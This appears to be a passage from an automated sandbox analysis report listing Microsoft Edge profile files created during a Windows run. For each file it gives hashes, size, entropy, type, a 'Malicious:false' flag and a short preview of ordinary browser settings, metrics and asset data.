                                                                                                                                                                  MD5:EA2308502EDF20B8168602A6E60A1CC4
                                                                                                                                                                  SHA1:35B7294564BDD8E04AD95DE9E0DADD4A5E13F95C
                                                                                                                                                                  SHA-256:433BBAF8A675FD00AE35D0EF28B7397769C7ED42D588658C1C75AB586C3EE0F6
                                                                                                                                                                  SHA-512:40A8CDC4E6F033BAF2AB137ABF845F6B7FB11207FCF8365D9C6AB0D515D6B16196C0459969A15535FCC8AC0307FB207BC3A7E5AE7E71D83561B2FBAC03097A34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.43895561190777904
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:Yy9Tb5n2qRloGdxFvIeEQ0E9CePINOO9qsW1qviYiQW1ig1HFC:nbIOl9dfvIeZzoOUqsW1qviYiniaH8
                                                                                                                                                                  MD5:DC7F7DDD5F1E8D95AA753F1BEE234F3A
                                                                                                                                                                  SHA1:F33456420C2793E02B651B7017C65AF5C5B0F80A
                                                                                                                                                                  SHA-256:2AB013B193BC9611231F9C9D0755A8AE9A69774CD0A0880720DC400A7540E3ED
                                                                                                                                                                  SHA-512:A693F2CC18514D39C2D126EE8B69F11F55F1BEF8625D05FB97386825E9442E55F620E05B058E3013522D1936FB2BC7ED7598E7F84FBF514D69D1A4CA8E856D1E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............P...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K...G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.03936653229870678
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:XI01utmqvDqKX2JsZTkmtzH6DL8gwXRRPkcah+XNEhcN0RQMB/yZWgn8y08Tcm2D:Y0EtyppFhkDGpyZb08T2RGOD
                                                                                                                                                                  MD5:ADC4558F36641D1040B9E7D78CE4ABC6
                                                                                                                                                                  SHA1:8EB5E56FBB9C9A3379B3F8B564BC92A48949C082
                                                                                                                                                                  SHA-256:D99862BCFEAA8FCE25F6F60F74D71B31BAF0CE276463AF499FBE6F0752A1CD88
                                                                                                                                                                  SHA-512:B04E0E44A60F738DBD12308B325EADA376FF68557FD58E2F367A4D9C684692F44BE3B2453716544D0B6DCBBB71E47B7729ACE9F15250458964943C1E42078E6A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@...............p`..(P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....u.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.04072953774759179
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:IE0EbZmqvDtKX77JEa3XxxTxqZ/g+XI970R6Eqh57NgGnG1gQMWP0Bn8y08Tcm2D:b0EZ4eK8Y9FhxFCgaPS08T2RGOD
                                                                                                                                                                  MD5:26E1CC941F3158E426DC481D467007BD
                                                                                                                                                                  SHA1:67EE19A9DA3D161A08CA3707B69146C17C4DBA76
                                                                                                                                                                  SHA-256:16AC3F500B31348AA9ABB6208696678D2F3C6377BD688DCB0B8645DB213AA80D
                                                                                                                                                                  SHA-512:2E70B717946B57665D8E694445B2F3B79176B28E42B4F351B7E972ACF4BE0A70F449F33166170D4E4411A01EEAD2CA9FA08336898D7FA2DAC044B7AA741504FE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                  Entropy (8bit):0.03985340798929576
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:0J0EbZmqvD3KX72JEa3Xxx7uqZGXPtg34khtbNE3nnI1gQMu1oBLn8y08Tcm2RGY:+0EZLe18xphlCggi1C08T2RGOD
                                                                                                                                                                  MD5:2F9BA9E7B1260D2586C6CF46AC03F81D
                                                                                                                                                                  SHA1:9FCED6E297662F5D4D9B42191110CE029F1DCECB
                                                                                                                                                                  SHA-256:4E3B576D7C668C9CF0D52BFC5E26D68AC161CF86DD1805A53BD3282959C91E11
                                                                                                                                                                  SHA-512:595E925159ED7025534B5641D77A32DD9568210BB2AE30E9EE1E83E8FD590707B90FD0A037F42CA0B526445789CD4FB88D0A9CBCBC21DC9A9CED86024A3D674C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                  Entropy (8bit):3.060980776278344
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                                  MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                                  SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
                                                                                                                                                                  SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                                  SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34462
                                                                                                                                                                  Entropy (8bit):5.558788214244173
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBlZWPOkfUl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVxCVw3rwyTTDdKpvtu6:fgkBlZWPOkfUlu1jagEwkyTt6t1
                                                                                                                                                                  MD5:C5ACC78339F79F1814A1509DCF475755
                                                                                                                                                                  SHA1:157B6BAEBDA80954E7146017456139E44AA94664
                                                                                                                                                                  SHA-256:61FD1E345F09C2E2A90C65A59F8C65C84A665CC6DCEE069F81AE3B198A6B23E5
                                                                                                                                                                  SHA-512:08027B14E071D2A3CC4A7E9756C135D407C76AC78A076B1F19437889DAB29AFE1E2085C58D1138DAABCA6976A2AD2DA9C0AD5B2DE1BA5790AD22CEAE1966DEE1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17577), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17578
                                                                                                                                                                  Entropy (8bit):5.418576984252411
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6jY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVby+1f:sVsLAJu4YJVelLTtA6pUqQwdP
                                                                                                                                                                  MD5:8085F24123BE4E0064145EAA09312CA1
                                                                                                                                                                  SHA1:832ED2296DDCBD8B20F1F99B47860CF1B8BF82D5
                                                                                                                                                                  SHA-256:6BED7BAA62F1837CC1BF65A5EDA93446B6F77A525AD289AC740DEA98CCB4034F
                                                                                                                                                                  SHA-512:A0EC7E678604C814009804C1D75767922AD5C9E8905EBA4482247481D55B65106D7CC3D037854E2F32C454F7A179394DB6E4270EE44D7630D515ED27458F40FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18304), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18305
                                                                                                                                                                  Entropy (8bit):5.458121331942733
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVZAP:sVsLAJu4YJVel3DJTtA6pUqQwbAP
                                                                                                                                                                  MD5:2EBBB08DB23C6FED04DBA7BD2491BEA8
                                                                                                                                                                  SHA1:E36A70B41EC00E6098CB5DA85312D1AB340B8BB4
                                                                                                                                                                  SHA-256:6B66E9D58FDA97592CFA63A78BF92F52A939CD720D3EDD62F18D6419F7BCD872
                                                                                                                                                                  SHA-512:8AE26416E0551B4DA06359AB67E1152AA76A49E72ECBC673E1D6845835D4BC491BA6B72A7CFD490F918905E259BEB458EC4651B300499A87914327D0700BED13
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                  Entropy (8bit):5.041147618414944
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:nPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:nPfZ/mS5
                                                                                                                                                                  MD5:A43225C579B1A85221E2F0A08D28066D
                                                                                                                                                                  SHA1:289FD534567EF7BB4A939B8F8768005EC3FF685C
                                                                                                                                                                  SHA-256:A0CC38334B0233FFF66E38946ED950949E7DB4E3C0E86D7C65965579A1D7EA3B
                                                                                                                                                                  SHA-512:BDDF05D8B61D4324F6627B4F2C9D6FD59EBCF15B4D1D6C2E616B2455AFD3A9E1793D83D92DC1CCAAB32FF5920052CBAB7228DE824F4128F098A2FB88B2EE603E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380675481154129.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].r...................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380675481166271.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):293
                                                                                                                                                                  Entropy (8bit):5.089389700065497
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/fFo0q1wkn23oH+Tcwt9Eh1ZB2KLl94ZN4q2Pwkn23oH+Tcwt9Eh1tIFUv:7/P1fYeb9Eh1ZFLz4z4vYfYeb9Eh16F2
                                                                                                                                                                  MD5:D959964D6E8638DDE2AD33C5338CA051
                                                                                                                                                                  SHA1:58C06A2C7713EADEA0CB666A1BCD5AB064F349D9
                                                                                                                                                                  SHA-256:E6985262965F46AEF6013FD73F1917CF35CB683C839579AC88EDD3EBD75F9C3A
                                                                                                                                                                  SHA-512:F7D314E3E76E274AA3450F06F3825F1A449A5493DE04BA61723FE3E4E33DF5A5B215FE9F20E1B8705532CC0ACA3662BED88BFF24AE8C52C8742F10C77C3A8B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:00.330 1660 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/06-17:18:00.486 1660 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
